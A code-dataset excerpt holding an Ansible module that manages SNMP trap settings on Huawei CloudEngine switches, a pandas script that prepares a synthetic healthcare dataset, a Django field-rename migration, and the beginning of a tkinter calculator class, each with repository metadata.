    interface_types = ['Ethernet', 'Eth-Trunk', 'Tunnel', 'NULL', 'LoopBack', 'Vlanif',
                       '100GE', '40GE', 'MTunnel', '10GE', 'GE', 'MEth', 'Vbdif', 'Nve']

    argument_spec = dict(
        state=dict(choices=['present', 'absent'], default='present'),
        feature_name=dict(choices=feature_names),
        trap_name=dict(type='str'),
        interface_type=dict(choices=interface_types),
        interface_number=dict(type='str'),
        port_number=dict(type='str')
    )

    # merge in the common CloudEngine connection arguments
    argument_spec.update(ce_argument_spec)
    SnmpTraps(argument_spec=argument_spec).work()
main()
| 35.639344 | 104 | 0.533425 | #!/usr/bin/python
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'status': ['preview'],
'supported_by': 'community',
'metadata_version': '1.0'}
DOCUMENTATION = '''
---
module: ce_snmp_traps
version_added: "2.4"
short_description: Manages SNMP traps configuration on HUAWEI CloudEngine switches.
description:
- Manages SNMP traps configurations on HUAWEI CloudEngine switches.
author:
- wangdezhuang (@CloudEngine-Ansible)
options:
feature_name:
description:
- Alarm feature name.
required: false
default: null
choices: ['aaa', 'arp', 'bfd', 'bgp', 'cfg', 'configuration', 'dad', 'devm',
'dhcpsnp', 'dldp', 'driver', 'efm', 'erps', 'error-down', 'fcoe',
'fei', 'fei_comm', 'fm', 'ifnet', 'info', 'ipsg', 'ipv6', 'isis',
'l3vpn', 'lacp', 'lcs', 'ldm', 'ldp', 'ldt', 'lldp', 'mpls_lspm',
'msdp', 'mstp', 'nd', 'netconf', 'nqa', 'nvo3', 'openflow', 'ospf',
'ospfv3', 'pim', 'pim-std', 'qos', 'radius', 'rm', 'rmon', 'securitytrap',
'smlktrap', 'snmp', 'ssh', 'stackmng', 'sysclock', 'sysom', 'system',
'tcp', 'telnet', 'trill', 'trunk', 'tty', 'vbst', 'vfs', 'virtual-perception',
'vrrp', 'vstm', 'all']
trap_name:
description:
- Alarm trap name.
required: false
default: null
interface_type:
description:
- Interface type.
required: false
default: null
choices: ['Ethernet', 'Eth-Trunk', 'Tunnel', 'NULL', 'LoopBack', 'Vlanif', '100GE',
'40GE', 'MTunnel', '10GE', 'GE', 'MEth', 'Vbdif', 'Nve']
interface_number:
description:
- Interface number.
required: false
default: null
port_number:
description:
- Source port number.
required: false
default: null
'''
EXAMPLES = '''
- name: CloudEngine snmp traps test
hosts: cloudengine
connection: local
gather_facts: no
vars:
cli:
host: "{{ inventory_hostname }}"
port: "{{ ansible_ssh_port }}"
username: "{{ username }}"
password: "{{ password }}"
transport: cli
tasks:
- name: "Config SNMP trap all enable"
ce_snmp_traps:
state: present
feature_name: all
provider: "{{ cli }}"
- name: "Config SNMP trap interface"
ce_snmp_traps:
state: present
interface_type: 40GE
interface_number: 2/0/1
provider: "{{ cli }}"
- name: "Config SNMP trap port"
ce_snmp_traps:
state: present
port_number: 2222
provider: "{{ cli }}"
'''
RETURN = '''
changed:
description: check to see if a change was made on the device
returned: always
type: boolean
sample: true
proposed:
description: k/v pairs of parameters passed into module
returned: always
type: dict
sample: {"feature_name": "all",
"state": "present"}
existing:
    description: k/v pairs of existing snmp-agent trap configuration
returned: always
type: dict
sample: {"snmp-agent trap": [],
"undo snmp-agent trap": []}
end_state:
    description: k/v pairs of snmp-agent trap configuration after module execution
returned: always
type: dict
sample: {"snmp-agent trap": ["enable"],
"undo snmp-agent trap": []}
updates:
description: command sent to the device
returned: always
type: list
sample: ["snmp-agent trap enable"]
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.ce import get_config, load_config, ce_argument_spec, run_commands
class SnmpTraps(object):
    """ Manages SNMP trap configuration.

    Reads the module parameters, queries the device's current trap
    configuration over the CLI, applies any required changes and reports
    proposed/existing/end states back to Ansible.
    """

    def __init__(self, **kwargs):
        """ Class init """
        # module
        argument_spec = kwargs["argument_spec"]
        self.spec = argument_spec
        # interface_type and interface_number only make sense as a pair,
        # hence required_together; check_mode is honoured in cli_load_config().
        self.module = AnsibleModule(
            argument_spec=self.spec,
            required_together=[("interface_type", "interface_number")],
            supports_check_mode=True
        )

        # config: device's current trap configuration, filled by get_existing()
        self.cur_cfg = dict()
        self.cur_cfg["snmp-agent trap"] = []
        self.cur_cfg["undo snmp-agent trap"] = []

        # module args
        self.state = self.module.params['state']
        self.feature_name = self.module.params['feature_name']
        self.trap_name = self.module.params['trap_name']
        self.interface_type = self.module.params['interface_type']
        self.interface_number = self.module.params['interface_number']
        self.port_number = self.module.params['port_number']

        # state reported back to Ansible
        self.changed = False
        self.updates_cmd = list()
        self.results = dict()
        self.proposed = dict()
        self.existing = dict()
        self.existing["snmp-agent trap"] = []
        self.existing["undo snmp-agent trap"] = []
        self.end_state = dict()
        self.end_state["snmp-agent trap"] = []
        self.end_state["undo snmp-agent trap"] = []

        # Cache the interface summary so check_args() can verify that the
        # requested trap source interface actually exists on the device.
        commands = list()
        cmd1 = 'display interface brief'
        commands.append(cmd1)
        self.interface = run_commands(self.module, commands)

    def check_args(self):
        """ Check invalid args """
        # port_number must be a numeric string in the unprivileged range.
        if self.port_number:
            if self.port_number.isdigit():
                if int(self.port_number) < 1025 or int(self.port_number) > 65535:
                    self.module.fail_json(
                        msg='Error: The value of port_number is out of [1025 - 65535].')
            else:
                self.module.fail_json(
                    msg='Error: The port_number is not digit.')

        # The source interface must appear in 'display interface brief' output.
        if self.interface_type and self.interface_number:
            tmp_interface = self.interface_type + self.interface_number
            if tmp_interface not in self.interface[0]:
                self.module.fail_json(
                    msg='Error: The interface %s is not in the device.' % tmp_interface)

    def get_proposed(self):
        """ Get proposed state """
        # Only parameters the user actually supplied are reported.
        self.proposed["state"] = self.state
        if self.feature_name:
            self.proposed["feature_name"] = self.feature_name
        if self.trap_name:
            self.proposed["trap_name"] = self.trap_name
        if self.interface_type:
            self.proposed["interface_type"] = self.interface_type
        if self.interface_number:
            self.proposed["interface_number"] = self.interface_number
        if self.port_number:
            self.proposed["port_number"] = self.port_number

    def get_existing(self):
        """ Get existing state """
        tmp_cfg = self.cli_get_config()
        if tmp_cfg:
            # Trap enable lines are compared case-insensitively; interface and
            # port values are extracted from the original-case text.
            temp_cfg_lower = tmp_cfg.lower()
            temp_data = tmp_cfg.split("\n")
            temp_data_lower = temp_cfg_lower.split("\n")

            for item in temp_data:
                if "snmp-agent trap source-port " in item:
                    if self.port_number:
                        item_tmp = item.split("snmp-agent trap source-port ")
                        self.cur_cfg["trap source-port"] = item_tmp[1]
                        self.existing["trap source-port"] = item_tmp[1]
                elif "snmp-agent trap source " in item:
                    if self.interface_type:
                        item_tmp = item.split("snmp-agent trap source ")
                        self.cur_cfg["trap source interface"] = item_tmp[1]
                        self.existing["trap source interface"] = item_tmp[1]

            if self.feature_name:
                # Branch order matters: the more specific "undo ... enable X"
                # prefix is tested before the plain "enable X" prefix.
                for item in temp_data_lower:
                    if item == "snmp-agent trap enable":
                        self.cur_cfg["snmp-agent trap"].append("enable")
                        self.existing["snmp-agent trap"].append("enable")
                    elif item == "snmp-agent trap disable":
                        self.cur_cfg["snmp-agent trap"].append("disable")
                        self.existing["snmp-agent trap"].append("disable")
                    elif "undo snmp-agent trap enable " in item:
                        item_tmp = item.split("undo snmp-agent trap enable ")
                        self.cur_cfg[
                            "undo snmp-agent trap"].append(item_tmp[1])
                        self.existing[
                            "undo snmp-agent trap"].append(item_tmp[1])
                    elif "snmp-agent trap enable " in item:
                        item_tmp = item.split("snmp-agent trap enable ")
                        self.cur_cfg["snmp-agent trap"].append(item_tmp[1])
                        self.existing["snmp-agent trap"].append(item_tmp[1])
            else:
                # No feature requested: drop the trap lists from the report.
                del self.existing["snmp-agent trap"]
                del self.existing["undo snmp-agent trap"]

    def get_end_state(self):
        """ Get end_state state """
        # Same parsing as get_existing(), but recorded into end_state only
        # (cur_cfg is left untouched).
        tmp_cfg = self.cli_get_config()
        if tmp_cfg:
            temp_cfg_lower = tmp_cfg.lower()
            temp_data = tmp_cfg.split("\n")
            temp_data_lower = temp_cfg_lower.split("\n")

            for item in temp_data:
                if "snmp-agent trap source-port " in item:
                    if self.port_number:
                        item_tmp = item.split("snmp-agent trap source-port ")
                        self.end_state["trap source-port"] = item_tmp[1]
                elif "snmp-agent trap source " in item:
                    if self.interface_type:
                        item_tmp = item.split("snmp-agent trap source ")
                        self.end_state["trap source interface"] = item_tmp[1]

            if self.feature_name:
                for item in temp_data_lower:
                    if item == "snmp-agent trap enable":
                        self.end_state["snmp-agent trap"].append("enable")
                    elif item == "snmp-agent trap disable":
                        self.end_state["snmp-agent trap"].append("disable")
                    elif "undo snmp-agent trap enable " in item:
                        item_tmp = item.split("undo snmp-agent trap enable ")
                        self.end_state[
                            "undo snmp-agent trap"].append(item_tmp[1])
                    elif "snmp-agent trap enable " in item:
                        item_tmp = item.split("snmp-agent trap enable ")
                        self.end_state["snmp-agent trap"].append(item_tmp[1])
            else:
                del self.end_state["snmp-agent trap"]
                del self.end_state["undo snmp-agent trap"]

    def cli_load_config(self, commands):
        """ Load configure through cli """
        # check_mode support: no commands are pushed during a dry run.
        if not self.module.check_mode:
            load_config(self.module, commands)

    def cli_get_config(self):
        """ Get configure through cli """
        # Filter the running config down to snmp trap related lines.
        regular = "| include snmp | include trap"
        flags = list()
        flags.append(regular)
        tmp_cfg = get_config(self.module, flags)

        return tmp_cfg

    def set_trap_feature_name(self):
        """ Set feature name for trap """
        # feature_name == "all" enables every trap; otherwise enable a single
        # feature (optionally narrowed to one trap name).
        if self.feature_name == "all":
            cmd = "snmp-agent trap enable"
        else:
            cmd = "snmp-agent trap enable feature-name %s" % self.feature_name
            if self.trap_name:
                cmd += " trap-name %s" % self.trap_name

        self.updates_cmd.append(cmd)
        cmds = list()
        cmds.append(cmd)
        self.cli_load_config(cmds)
        self.changed = True

    def undo_trap_feature_name(self):
        """ Undo feature name for trap """
        if self.feature_name == "all":
            cmd = "undo snmp-agent trap enable"
        else:
            cmd = "undo snmp-agent trap enable feature-name %s" % self.feature_name
            if self.trap_name:
                cmd += " trap-name %s" % self.trap_name

        self.updates_cmd.append(cmd)
        cmds = list()
        cmds.append(cmd)
        self.cli_load_config(cmds)
        self.changed = True

    def set_trap_source_interface(self):
        """ Set source interface for trap """
        cmd = "snmp-agent trap source %s %s" % (
            self.interface_type, self.interface_number)
        self.updates_cmd.append(cmd)
        cmds = list()
        cmds.append(cmd)
        self.cli_load_config(cmds)
        self.changed = True

    def undo_trap_source_interface(self):
        """ Undo source interface for trap """
        cmd = "undo snmp-agent trap source"
        self.updates_cmd.append(cmd)
        cmds = list()
        cmds.append(cmd)
        self.cli_load_config(cmds)
        self.changed = True

    def set_trap_source_port(self):
        """ Set source port for trap """
        cmd = "snmp-agent trap source-port %s" % self.port_number
        self.updates_cmd.append(cmd)
        cmds = list()
        cmds.append(cmd)
        self.cli_load_config(cmds)
        self.changed = True

    def undo_trap_source_port(self):
        """ Undo source port for trap """
        cmd = "undo snmp-agent trap source-port"
        self.updates_cmd.append(cmd)
        cmds = list()
        cmds.append(cmd)
        self.cli_load_config(cmds)
        self.changed = True

    def work(self):
        """ The work function """
        self.check_args()
        self.get_proposed()
        self.get_existing()

        find_flag = False
        find_undo_flag = False
        tmp_interface = None

        if self.state == "present":
            if self.feature_name:
                # The config token we look for in the parsed device state.
                if self.trap_name:
                    tmp_cfg = "feature-name %s trap-name %s" % (
                        self.feature_name, self.trap_name.lower())
                else:
                    tmp_cfg = "feature-name %s" % self.feature_name

                # An explicit "undo ... " line means the trap is currently
                # disabled, so it must be (re-)enabled.
                find_undo_flag = False
                if self.cur_cfg["undo snmp-agent trap"]:
                    for item in self.cur_cfg["undo snmp-agent trap"]:
                        if item == tmp_cfg:
                            find_undo_flag = True
                        elif tmp_cfg in item:
                            find_undo_flag = True
                        elif self.feature_name == "all":
                            find_undo_flag = True
                if find_undo_flag:
                    self.set_trap_feature_name()

                # Otherwise, enable it only if no matching enable line exists.
                if not find_undo_flag:
                    find_flag = False
                    if self.cur_cfg["snmp-agent trap"]:
                        for item in self.cur_cfg["snmp-agent trap"]:
                            if item == "enable":
                                find_flag = True
                            elif item == tmp_cfg:
                                find_flag = True
                    if not find_flag:
                        self.set_trap_feature_name()

            if self.interface_type:
                # Configure the source interface unless it already matches.
                find_flag = False
                tmp_interface = self.interface_type + self.interface_number

                if "trap source interface" in self.cur_cfg.keys():
                    if self.cur_cfg["trap source interface"] == tmp_interface:
                        find_flag = True

                if not find_flag:
                    self.set_trap_source_interface()

            if self.port_number:
                # Configure the source port unless it already matches.
                find_flag = False
                if "trap source-port" in self.cur_cfg.keys():
                    if self.cur_cfg["trap source-port"] == self.port_number:
                        find_flag = True
                if not find_flag:
                    self.set_trap_source_port()

        else:
            # state == "absent": remove whatever matching config exists.
            if self.feature_name:
                if self.trap_name:
                    tmp_cfg = "feature-name %s trap-name %s" % (
                        self.feature_name, self.trap_name.lower())
                else:
                    tmp_cfg = "feature-name %s" % self.feature_name

                # An empty enable-list means traps are implicitly enabled,
                # hence find_flag defaults to True in that case.
                find_flag = False
                if self.cur_cfg["snmp-agent trap"]:
                    for item in self.cur_cfg["snmp-agent trap"]:
                        if item == tmp_cfg:
                            find_flag = True
                        elif item == "enable":
                            find_flag = True
                        elif tmp_cfg in item:
                            find_flag = True
                else:
                    find_flag = True

                find_undo_flag = False
                if self.cur_cfg["undo snmp-agent trap"]:
                    for item in self.cur_cfg["undo snmp-agent trap"]:
                        if item == tmp_cfg:
                            find_undo_flag = True
                        elif tmp_cfg in item:
                            find_undo_flag = True

                # Already undone -> nothing to do; otherwise disable it.
                if find_undo_flag:
                    pass
                elif find_flag:
                    self.undo_trap_feature_name()

            if self.interface_type:
                if "trap source interface" in self.cur_cfg.keys():
                    self.undo_trap_source_interface()

            if self.port_number:
                if "trap source-port" in self.cur_cfg.keys():
                    self.undo_trap_source_port()

        self.get_end_state()

        self.results['changed'] = self.changed
        self.results['proposed'] = self.proposed
        self.results['existing'] = self.existing
        self.results['end_state'] = self.end_state
        self.results['updates'] = self.updates_cmd

        self.module.exit_json(**self.results)
def main():
    """ Module main """
    # Schema of the module's arguments; merged below with the shared
    # CloudEngine connection options (ce_argument_spec).
    argument_spec = dict(
        state=dict(choices=['present', 'absent'], default='present'),
        feature_name=dict(choices=['aaa', 'arp', 'bfd', 'bgp', 'cfg', 'configuration', 'dad',
                                   'devm', 'dhcpsnp', 'dldp', 'driver', 'efm', 'erps', 'error-down',
                                   'fcoe', 'fei', 'fei_comm', 'fm', 'ifnet', 'info', 'ipsg', 'ipv6',
                                   'isis', 'l3vpn', 'lacp', 'lcs', 'ldm', 'ldp', 'ldt', 'lldp',
                                   'mpls_lspm', 'msdp', 'mstp', 'nd', 'netconf', 'nqa', 'nvo3',
                                   'openflow', 'ospf', 'ospfv3', 'pim', 'pim-std', 'qos', 'radius',
                                   'rm', 'rmon', 'securitytrap', 'smlktrap', 'snmp', 'ssh', 'stackmng',
                                   'sysclock', 'sysom', 'system', 'tcp', 'telnet', 'trill', 'trunk',
                                   'tty', 'vbst', 'vfs', 'virtual-perception', 'vrrp', 'vstm', 'all']),
        trap_name=dict(type='str'),
        interface_type=dict(choices=['Ethernet', 'Eth-Trunk', 'Tunnel', 'NULL', 'LoopBack', 'Vlanif',
                                     '100GE', '40GE', 'MTunnel', '10GE', 'GE', 'MEth', 'Vbdif', 'Nve']),
        interface_number=dict(type='str'),
        port_number=dict(type='str')
    )

    argument_spec.update(ce_argument_spec)
    # work() never returns normally: it reports via exit_json()/fail_json().
    module = SnmpTraps(argument_spec=argument_spec)
    module.work()


if __name__ == '__main__':
    main()
| 0 | 0 | 0 |
e900cb25ac311208e0b435f3e7039d91abadad7f | 7,435 | py | Python | scripts/process-files.py | IBM/cpd-workshop-health-care | 5c84be0a3557578aada7616023ae439d4033eb34 | [
"Apache-2.0"
] | 2 | 2020-11-11T08:32:27.000Z | 2020-12-15T16:56:00.000Z | scripts/process-files.py | IBM/cpd-workshop-health-care | 5c84be0a3557578aada7616023ae439d4033eb34 | [
"Apache-2.0"
] | 1 | 2020-12-08T22:36:25.000Z | 2020-12-08T22:36:25.000Z | scripts/process-files.py | IBM/cpd-workshop-health-care | 5c84be0a3557578aada7616023ae439d4033eb34 | [
"Apache-2.0"
] | 1 | 2021-05-13T06:26:45.000Z | 2021-05-13T06:26:45.000Z | import csv
import datetime
import random
import sys
import os
import time
import argparse
import pandas as pd
import json
from pyspark.sql import SparkSession
from pyspark.sql.functions import col
BASE_DIR = "/Users/jrtorres/Documents/JRTDocs/Development/General_Projects/cpd-workshop-health-care/data/"
OUTPUT_DIR = "/Users/jrtorres/tmp/"
LOINC_CODES_NAMES = {
"8302-2": "Height",
"29463-7": "Weight",
"6690-2": "Leukocytes",
"789-8": "Erythrocytes",
"718-7": "Hemoglobin",
"4544-3": "Hematocrit",
"787-2": "MCV",
"785-6": "MCH",
"786-4": "MCHC",
"777-3": "Platelets",
"8462-4": "Diastolic Blood Pressure",
"8480-6": "Systolic Blood Pressure",
"39156-5": "Body Mass Index",
"2093-3": "Total Cholesterol",
"2571-8": "Triglycerides",
"18262-6": "LDL Cholesterol",
"2085-9": "HDL Cholesterol",
"4548-4": "A1c Hemoglobin Total",
"2339-0": "Glucose",
"6299-2": "Urea Nitrogen",
"38483-4": "Creatinine",
"49765-1": "Calcium",
"2947-0": "Sodium",
"6298-4": "Potassium",
"2069-3": "Chloride",
"20565-8": "Carbon Dioxide",
"14959-1": "Microalbumin Creatinine Ratio",
"38265-5": "DXA Bone density",
"26464-8": "White Blood Cell",
"26453-1": "Red Blood Cell",
"30385-9": "RBC Distribution Width",
"26515-7": "Platelet Count"
}
if __name__ == "__main__":
    # Command-line entry point for the healthcare data-set preparation script.
    if sys.version_info[0] < 3:
        raise Exception("Python 3 or higher version is required for this script.")

    parser = argparse.ArgumentParser(prog="python %s)" % os.path.basename(__file__), description="Script that manages healthcare dataset.")
    parser.add_argument("-output-base-directory", dest="out_base_dir", required=False, default=None, help="Directory to store output files.")
    parser.add_argument("-input-base-directory", dest="in_base_dir", required=False, default=None, help="Directory with healthcare data set.")
    parser.add_argument("-num-patients", dest="num_records", required=False, type=int, default=0, help="Number of patients.")

    print("Starting script.\n")
    args = parser.parse_args()
    started_time = time.time()
    # Bugfix: compare by value, not identity. "is not 0" depends on CPython's
    # small-int caching and is a SyntaxWarning on Python 3.8+.
    if args.num_records != 0:
        subset_files_by_patient(args.num_records)
    #print_unique_observation_codedescriptions("/Users/jrtorres/tmp/observations_small.csv")
    #transpose_observations("/Users/jrtorres/tmp/observations_small_test.csv", "/Users/jrtorres/tmp/test_process_obs2.csv")
    transpose_observations(BASE_DIR+"observations.csv", OUTPUT_DIR+"observations_processed.csv")
    elapsed = time.time() - started_time
    print("\nFinished script. Elapsed time: %f" % elapsed)
| 49.238411 | 160 | 0.689307 | import csv
import datetime
import random
import sys
import os
import time
import argparse
import pandas as pd
import json
from pyspark.sql import SparkSession
from pyspark.sql.functions import col
# Developer-local input/output locations; callers may pass explicit
# directories to subset_files_by_patient() instead of relying on these.
BASE_DIR = "/Users/jrtorres/Documents/JRTDocs/Development/General_Projects/cpd-workshop-health-care/data/"
OUTPUT_DIR = "/Users/jrtorres/tmp/"

# LOINC observation codes of interest, mapped to the human-readable names
# used to label columns when transposing observations into wide format.
LOINC_CODES_NAMES = {
    "8302-2": "Height",
    "29463-7": "Weight",
    "6690-2": "Leukocytes",
    "789-8": "Erythrocytes",
    "718-7": "Hemoglobin",
    "4544-3": "Hematocrit",
    "787-2": "MCV",
    "785-6": "MCH",
    "786-4": "MCHC",
    "777-3": "Platelets",
    "8462-4": "Diastolic Blood Pressure",
    "8480-6": "Systolic Blood Pressure",
    "39156-5": "Body Mass Index",
    "2093-3": "Total Cholesterol",
    "2571-8": "Triglycerides",
    "18262-6": "LDL Cholesterol",
    "2085-9": "HDL Cholesterol",
    "4548-4": "A1c Hemoglobin Total",
    "2339-0": "Glucose",
    "6299-2": "Urea Nitrogen",
    "38483-4": "Creatinine",
    "49765-1": "Calcium",
    "2947-0": "Sodium",
    "6298-4": "Potassium",
    "2069-3": "Chloride",
    "20565-8": "Carbon Dioxide",
    "14959-1": "Microalbumin Creatinine Ratio",
    "38265-5": "DXA Bone density",
    "26464-8": "White Blood Cell",
    "26453-1": "Red Blood Cell",
    "30385-9": "RBC Distribution Width",
    "26515-7": "Platelet Count"
}
def subset_files_by_patient(num_patients, base_directory=None, output_directory=None):
    """Write a copy of each dataset CSV restricted to the first num_patients patients.

    Reads patients.csv plus the per-patient record files (allergies, conditions,
    encounters, immunizations, medications, observations) from base_directory,
    keeps only rows whose PATIENT id belongs to the first num_patients entries
    of patients.csv, and writes the filtered files to output_directory.

    Args:
        num_patients: number of patients (head of patients.csv) to keep.
        base_directory: input directory; defaults to BASE_DIR when None.
        output_directory: output directory; defaults to OUTPUT_DIR when None.
    """
    # Resolve module-level defaults lazily so the function can be used without
    # depending on the hard-coded developer paths at definition time.
    if base_directory is None:
        base_directory = BASE_DIR
    if output_directory is None:
        output_directory = OUTPUT_DIR

    patients_df = pd.read_csv(base_directory + "/patients.csv")
    allergies_df = pd.read_csv(base_directory + "/allergies.csv")
    conditions_df = pd.read_csv(base_directory + "/conditions.csv")
    encounters_df = pd.read_csv(base_directory + "/encounters.csv")
    immunizations_df = pd.read_csv(base_directory + "/immunizations.csv")
    medications_df = pd.read_csv(base_directory + "/medications.csv")
    observations_df = pd.read_csv(base_directory + "/observations.csv")

    patients_small_df = patients_df[:num_patients]
    # Files with just patient related data
    allergies_small_df = allergies_df[allergies_df["PATIENT"].isin(patients_small_df["ID"])]
    conditions_small_df = conditions_df[conditions_df["PATIENT"].isin(patients_small_df["ID"])]
    encounters_small_df = encounters_df[encounters_df["PATIENT"].isin(patients_small_df["ID"])]
    immunizations_small_df = immunizations_df[immunizations_df["PATIENT"].isin(patients_small_df["ID"])]
    medications_small_df = medications_df[medications_df["PATIENT"].isin(patients_small_df["ID"])]
    observations_small_df = observations_df[observations_df["PATIENT"].isin(patients_small_df["ID"])]

    print("Patients: ", patients_df.shape, "\t\tPatients Subset: ", patients_small_df.shape)
    print("Allergies: ", allergies_df.shape, "\t\tAllergies Subset: ", allergies_small_df.shape)
    print("Conditions: ", conditions_df.shape, "\t\tConditions Subset: ", conditions_small_df.shape)
    print("Encounters: ", encounters_df.shape, "\t\tEncounters Subset ", encounters_small_df.shape)
    print("Immunizations: ", immunizations_df.shape, "\t\tImmunizations Subset ", immunizations_small_df.shape)
    print("Medications: ", medications_df.shape, "\t\tMedications Subset: ", medications_small_df.shape)
    print("Observations: ", observations_df.shape, "\t\tObservations Subset: ", observations_small_df.shape)

    try:
        patients_small_df.to_csv(output_directory + "/patients.csv", index=False)
        allergies_small_df.to_csv(output_directory + "/allergies.csv", index=False)
        conditions_small_df.to_csv(output_directory + "/conditions.csv", index=False)
        encounters_small_df.to_csv(output_directory + "/encounters.csv", index=False)
        immunizations_small_df.to_csv(output_directory + "/immunizations.csv", index=False)
        medications_small_df.to_csv(output_directory + "/medications.csv", index=False)
        observations_small_df.to_csv(output_directory + "/observations.csv", index=False)
    # Bugfix: the original caught an undefined name 'Error' (itself a
    # NameError); to_csv raises OSError for filesystem problems.
    except OSError as e:
        print("Error: ", e)
def print_unique_observation_codedescriptions(observation_fname):
    """Print each distinct observation CODE with one sample DESCRIPTION."""
    obs = pd.read_csv(observation_fname)
    print("Total number of observations: ", len(obs))
    unique_codes = obs.CODE.unique()
    print("Number of unique observation codes: ", len(unique_codes))
    # For each code, show the description from the first row carrying it.
    for code in unique_codes:
        first_row = obs[obs.CODE == code].iloc[0]
        print('{:15s} {}'.format(code, first_row.loc['DESCRIPTION']))
def transpose_observations(observation_fname, output_fname):
    """Pivot the long-format observations CSV into wide format.

    Produces one row per (DATE, PATIENT, ENCOUNTER) with a column for every
    LOINC code in LOINC_CODES_NAMES, then writes the result to output_fname.
    """
    raw_df = pd.read_csv(observation_fname)
    merged_df = pd.DataFrame()
    for loinc_code, obs_name in LOINC_CODES_NAMES.items():
        print("========================================================")
        print("Starting columns: ", list(merged_df))
        col_name = obs_name + " [" + loinc_code + "]"
        # Rows for this code only, with VALUE renamed to the labelled column.
        code_df = raw_df[raw_df["CODE"] == loinc_code].filter(
            items=["DATE", "PATIENT", "ENCOUNTER", "VALUE"])
        code_df = code_df.rename(columns={'VALUE': col_name.upper()})
        if merged_df.empty:
            merged_df = code_df.copy()
        elif code_df.empty:
            print("No observations for: ", col_name)
        else:
            print("Attemptin merge of: ", list(code_df))
            merged_df = merged_df.merge(
                code_df, on=["DATE", "PATIENT", "ENCOUNTER"], how="outer")
        print("Ending columns: ", list(merged_df))
    print("========================================================")
    print("Final Schema: ")
    merged_df.info()
    merged_df.to_csv(output_fname, index=False)
if __name__ == "__main__":
    # Command-line entry point for the healthcare data-set preparation script.
    if sys.version_info[0] < 3:
        raise Exception("Python 3 or higher version is required for this script.")

    parser = argparse.ArgumentParser(prog="python %s)" % os.path.basename(__file__), description="Script that manages healthcare dataset.")
    parser.add_argument("-output-base-directory", dest="out_base_dir", required=False, default=None, help="Directory to store output files.")
    parser.add_argument("-input-base-directory", dest="in_base_dir", required=False, default=None, help="Directory with healthcare data set.")
    parser.add_argument("-num-patients", dest="num_records", required=False, type=int, default=0, help="Number of patients.")

    print("Starting script.\n")
    args = parser.parse_args()
    started_time = time.time()
    # Bugfix: compare by value, not identity. "is not 0" depends on CPython's
    # small-int caching and is a SyntaxWarning on Python 3.8+.
    if args.num_records != 0:
        subset_files_by_patient(args.num_records)
    #print_unique_observation_codedescriptions("/Users/jrtorres/tmp/observations_small.csv")
    #transpose_observations("/Users/jrtorres/tmp/observations_small_test.csv", "/Users/jrtorres/tmp/test_process_obs2.csv")
    transpose_observations(BASE_DIR+"observations.csv", OUTPUT_DIR+"observations_processed.csv")
    elapsed = time.time() - started_time
    print("\nFinished script. Elapsed time: %f" % elapsed)
| 4,695 | 0 | 69 |
f9cdc76f722ac504441daaa3a2cc12b337f137b8 | 584 | py | Python | evap/evaluation/migrations/0066_rename_course_is_required_for_reward.py | felixrindt/EvaP | fe65fcc511cc942695ce1edbaab170894f0d37b1 | [
"MIT"
] | 29 | 2020-02-28T23:03:41.000Z | 2022-02-19T09:29:36.000Z | evap/evaluation/migrations/0066_rename_course_is_required_for_reward.py | felixrindt/EvaP | fe65fcc511cc942695ce1edbaab170894f0d37b1 | [
"MIT"
] | 737 | 2015-01-02T17:43:25.000Z | 2018-12-10T20:45:10.000Z | evap/evaluation/migrations/0066_rename_course_is_required_for_reward.py | felixrindt/EvaP | fe65fcc511cc942695ce1edbaab170894f0d37b1 | [
"MIT"
] | 83 | 2015-01-14T12:39:41.000Z | 2018-10-29T16:36:43.000Z | # Generated by Django 2.0.5 on 2018-05-08 17:52
from django.db import migrations, models
| 22.461538 | 79 | 0.597603 | # Generated by Django 2.0.5 on 2018-05-08 17:52
from django.db import migrations, models
class Migration(migrations.Migration):
    # Renames Course.is_required_for_reward to is_rewarded and refreshes the
    # field definition (BooleanField, default True, verbose name "is rewarded").

    dependencies = [
        ('evaluation', '0065_questionnaire_type'),
    ]

    operations = [
        migrations.RenameField(
            model_name='course',
            old_name='is_required_for_reward',
            new_name='is_rewarded',
        ),
        migrations.AlterField(
            model_name='course',
            name='is_rewarded',
            field=models.BooleanField(default=True, verbose_name='is rewarded')
        ),
    ]
| 0 | 470 | 23 |
58c2741b98c4a786da6cb5614ef1568fb36b7ea4 | 3,474 | py | Python | calculator.py | arpansarkar190794/Arpan_Sarkar | b36f66f0ed00668b005fae903ce463883a803fd5 | [
"bzip2-1.0.6"
] | null | null | null | calculator.py | arpansarkar190794/Arpan_Sarkar | b36f66f0ed00668b005fae903ce463883a803fd5 | [
"bzip2-1.0.6"
] | null | null | null | calculator.py | arpansarkar190794/Arpan_Sarkar | b36f66f0ed00668b005fae903ce463883a803fd5 | [
"bzip2-1.0.6"
] | null | null | null | from tkinter import *
root = Tk()
my_gui = Calculator(root)
root.mainloop()
| 36.568421 | 127 | 0.578008 | from tkinter import *
class Calculator:
    """A simple four-function tkinter calculator with a text display."""

    def __init__(self, master):
        self.master = master
        master.title("Python Calculator")
        # create screen widget
        self.screen = Text(master, state='disabled', width=30, height=3, background="yellow", foreground="blue")
        # position screen in window
        self.screen.grid(row=0, column=0, columnspan=4, padx=5, pady=5)
        self.screen.configure(state='normal')
        # initialize screen value as empty
        self.equation = ''
        # create buttons using method createButton; write=None marks the
        # action keys (backspace and '=') that must not echo to the screen
        b1 = self.createButton(7)
        b2 = self.createButton(8)
        b3 = self.createButton(9)
        b4 = self.createButton(u"\u232B", None)
        b5 = self.createButton(4)
        b6 = self.createButton(5)
        b7 = self.createButton(6)
        b8 = self.createButton(u"\u00F7")
        b9 = self.createButton(1)
        b10 = self.createButton(2)
        b11 = self.createButton(3)
        b12 = self.createButton('*')
        b13 = self.createButton('.')
        b14 = self.createButton(0)
        b15 = self.createButton('+')
        b16 = self.createButton('-')
        b17 = self.createButton('=', None, 34)
        # buttons stored in list
        buttons = [b1, b2, b3, b4, b5, b6, b7, b8, b9, b10, b11, b12, b13, b14, b15, b16, b17]
        # initialize counter
        count = 0
        # arrange buttons with grid manager (4 x 4)
        for row in range(1, 5):
            for column in range(4):
                buttons[count].grid(row=row, column=column)
                count += 1
